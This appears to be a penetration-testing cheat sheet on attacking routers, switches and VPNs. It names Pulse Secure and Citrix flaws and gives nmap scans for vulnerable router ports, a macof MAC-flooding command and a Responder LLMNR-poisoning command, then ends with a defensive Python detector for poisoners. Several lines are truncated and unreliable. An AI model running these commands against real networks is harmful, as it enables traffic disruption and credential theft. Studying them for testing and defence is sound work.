✅ Exploiting Network infrastructure

Attacks on Network equipment: Routers, Switches, VPN



Hardcoded credentials vulnerabilities:


VPN Servers

Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure
CVSS 10.0 Metasploit exploit:

Citrix NetScaler


On Dec. 17, 2019, a directory traversal vulnerability was announced in the Citrix Application Discovery Controller and Citrix Gateway, which would allow a remote, unauthenticated user to write a file to a location on disk. Affected products include:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.1 all supported builds
  • Citrix ADC and NetScaler Gateway version 12.0 all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 all supported builds
  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds


Home routers

Scan for CVE-2015-3036 (NetUSB Kcodes):

nmap -p 20005 --open 192.168.1.*

Scan for CWMP Modem RCE / XXE:

nmap -p 7457 --open 192.168.1.*

Scan for faximum:

nmap -p 7437 --open 192.168.1.*

Scan for UPnP:

nmap -p 37215 -sV --open 192.168.1.*
wget -O -
wget -O -

Physical access exploitation (LAN)

MAC flooding

macof -n 1000



LLMNR poisoning

Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

responder -I eth0 -rv
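
On the detection side, a monitoring host can query LLMNR for random names that no machine owns and treat any answer as a poisoner. The sketch below is an added example, not part of the original post or of Responder: it parses LLMNR messages (RFC 4795, UDP port 5355) and flags sources that answer a canary name. The canary names, the IP addresses, the sample packets and the function names are all constructed for illustration.

```python
import socket
import struct

# Constructed canary names: random hostnames nobody on the LAN owns, which a
# monitoring host queries periodically. Only a poisoner will answer them.
CANARY_NAMES = {"wpad-x7q2kd", "fs-q81zzp"}

def parse_llmnr(payload):
    """Parse the header and first question name of an LLMNR message (RFC 4795)."""
    if len(payload) < 12:
        raise ValueError("shorter than the 12-byte header")
    _txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!6H", payload[:12])
    labels, pos = [], 12
    while pos < len(payload) and payload[pos] != 0:
        length = payload[pos]
        if length > 63 or pos + 1 + length > len(payload):
            raise ValueError("invalid label")
        labels.append(payload[pos + 1:pos + 1 + length].decode("ascii", "replace"))
        pos += 1 + length
    if pos >= len(payload):
        raise ValueError("truncated question name")
    return {"response": bool(flags & 0x8000), "answers": ancount,
            "name": ".".join(labels).lower()}

def find_poisoners(packets):
    """packets: (source IP, UDP/5355 payload) pairs. Returns {ip: canary names answered}."""
    hits = {}
    for src, payload in packets:
        try:
            msg = parse_llmnr(payload)
        except ValueError:
            continue  # malformed traffic is skipped, not trusted
        if msg["response"] and msg["answers"] and msg["name"] in CANARY_NAMES:
            hits.setdefault(src, set()).add(msg["name"])
    return hits

def build(name, answer_ip=None):
    """Build a constructed LLMNR query, or a response when answer_ip is given."""
    resp = 1 if answer_ip else 0
    qname = bytes([len(name)]) + name.encode() + b"\x00"
    head = struct.pack("!6H", 0x1234, resp << 15, 1, resp, 0, 0)
    body = qname + struct.pack("!2H", 1, 1)
    if answer_ip:
        body += qname + struct.pack("!2HIH", 1, 1, 30, 4) + socket.inet_aton(answer_ip)
    return head + body

SAMPLE = [("192.168.1.20", build("wpad-x7q2kd")),                  # canary query
          ("192.168.1.66", build("wpad-x7q2kd", "192.168.1.66")),  # poisoned answer
          ("192.168.1.10", build("fileserver", "192.168.1.10")),   # ordinary answer
          ("192.168.1.99", b"\x00\x01")]                           # malformed packet
```

Calling `find_poisoners(SAMPLE)` reports only 192.168.1.66; in a real deployment the packet pairs would come from a capture on UDP/5355 rather than from `build`.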

